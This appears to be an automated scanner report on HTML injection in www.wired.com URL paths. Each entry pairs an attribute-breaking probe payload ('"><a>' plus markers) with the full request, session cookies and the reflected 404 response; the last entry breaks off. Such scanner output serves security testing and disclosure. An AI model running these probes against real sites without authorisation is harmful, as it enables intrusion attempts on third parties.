The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea663"><a>000f8426a7e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveriesea663"><a>000f8426a7e/news/2009/01/dayintech_0129 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=569 Expires: Sun, 21 Nov 2010 23:22:23 GMT Date: Sun, 21 Nov 2010 23:12:54 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveriesea663"><a>000f8426a7e c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ad09"><a>6fa0ecd3e27 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news7ad09"><a>6fa0ecd3e27/2009/01/dayintech_0129 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=557 Expires: Sun, 21 Nov 2010 23:22:24 GMT Date: Sun, 21 Nov 2010 23:13:07 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news7ad09"><a>6fa0ecd3e27"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bda0"><a>ff99168443b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science8bda0"><a>ff99168443b/discoveries/news/2009/02/dayintech_0205 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=217 Expires: Sun, 21 Nov 2010 23:16:07 GMT Date: Sun, 21 Nov 2010 23:12:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science8bda0"><a>ff99168443b ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ddb8"><a>86307e83414 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries7ddb8"><a>86307e83414/news/2009/02/dayintech_0205 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:45 GMT Date: Sun, 21 Nov 2010 23:12:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries7ddb8"><a>86307e83414 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc7a4"><a>6eee09d380b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/newsfc7a4"><a>6eee09d380b/2009/02/dayintech_0205 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=560 Expires: Sun, 21 Nov 2010 23:22:15 GMT Date: Sun, 21 Nov 2010 23:12:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_newsfc7a4"><a>6eee09d380b"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28940"><a>0a1b81a1697 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science28940"><a>0a1b81a1697/discoveries/news/2009/03/dayintech_0319 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:16:24 GMT Date: Sun, 21 Nov 2010 23:12:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science28940"><a>0a1b81a1697 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 832c9"><a>90caa4165d3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries832c9"><a>90caa4165d3/news/2009/03/dayintech_0319 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=549 Expires: Sun, 21 Nov 2010 23:21:49 GMT Date: Sun, 21 Nov 2010 23:12:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries832c9"><a>90caa4165d3 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4864a"><a>d516e68821c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news4864a"><a>d516e68821c/2009/03/dayintech_0319 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:51 GMT Date: Sun, 21 Nov 2010 23:12:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news4864a"><a>d516e68821c"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88e90"><a>1b18fd01694 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science88e90"><a>1b18fd01694/discoveries/news/2009/03/dayintech_0331 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=217 Expires: Sun, 21 Nov 2010 23:16:03 GMT Date: Sun, 21 Nov 2010 23:12:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science88e90"><a>1b18fd01694 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e528a"><a>b36f778d09a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveriese528a"><a>b36f778d09a/news/2009/03/dayintech_0331 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:42 GMT Date: Sun, 21 Nov 2010 23:12:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveriese528a"><a>b36f778d09a c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa656"><a>9f2efb39a57 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/newsaa656"><a>9f2efb39a57/2009/03/dayintech_0331 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:53 GMT Date: Sun, 21 Nov 2010 23:12:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_newsaa656"><a>9f2efb39a57"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27c21"><a>ee25f07f338 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science27c21"><a>ee25f07f338/discoveries/news/2009/04/dayintech_0408 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:16:30 GMT Date: Sun, 21 Nov 2010 23:12:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science27c21"><a>ee25f07f338 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1af11"><a>b64fd6bf37a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries1af11"><a>b64fd6bf37a/news/2009/04/dayintech_0408 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=590 Expires: Sun, 21 Nov 2010 23:22:35 GMT Date: Sun, 21 Nov 2010 23:12:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries1af11"><a>b64fd6bf37a c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3001f"><a>f33ebe8dd11 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news3001f"><a>f33ebe8dd11/2009/04/dayintech_0408 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=542 Expires: Sun, 21 Nov 2010 23:21:58 GMT Date: Sun, 21 Nov 2010 23:12:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news3001f"><a>f33ebe8dd11"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9af6"><a>58d5798a2e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /sciencea9af6"><a>58d5798a2e1/planetearth HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29286 Vary: Accept-Encoding Cache-Control: max-age=216 Expires: Sun, 21 Nov 2010 23:12:53 GMT Date: Sun, 21 Nov 2010 23:09:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_sciencea9af6"><a>58d5798a2e1 ss_planetearth"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d4aa"><a>dad91b2864b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/planetearth1d4aa"><a>dad91b2864b HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29286 Vary: Accept-Encoding Cache-Control: max-age=591 Expires: Sun, 21 Nov 2010 23:19:31 GMT Date: Sun, 21 Nov 2010 23:09:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_planetearth1d4aa"><a>dad91b2864b"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dfa3"><a>00c4df6c89f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science2dfa3"><a>00c4df6c89f/space HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29274 Vary: Accept-Encoding Cache-Control: max-age=220 Expires: Sun, 21 Nov 2010 23:13:00 GMT Date: Sun, 21 Nov 2010 23:09:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science2dfa3"><a>00c4df6c89f ss_space"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19e09"><a>ac805a603f2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/space19e09"><a>ac805a603f2 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
